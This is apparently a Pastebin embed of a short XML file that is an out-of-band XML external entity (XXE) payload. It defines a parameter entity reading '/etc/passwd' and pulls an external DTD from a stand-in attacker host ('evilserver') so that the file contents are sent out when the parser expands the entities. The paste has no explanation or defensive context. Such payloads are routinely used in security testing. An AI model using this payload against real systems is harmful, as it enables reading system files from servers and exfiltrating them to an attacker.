document.write('
Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <!DOCTYPE foo [
  3.  <!ENTITY % file SYSTEM "file:///etc/passwd">
  4.   <!ENTITY % dtd SYSTEM "http://evilserver/send.dtd">
  5.   %dtd;
  6.   %send;
  7. ]>
  8. <elemento>datos</elemento>
');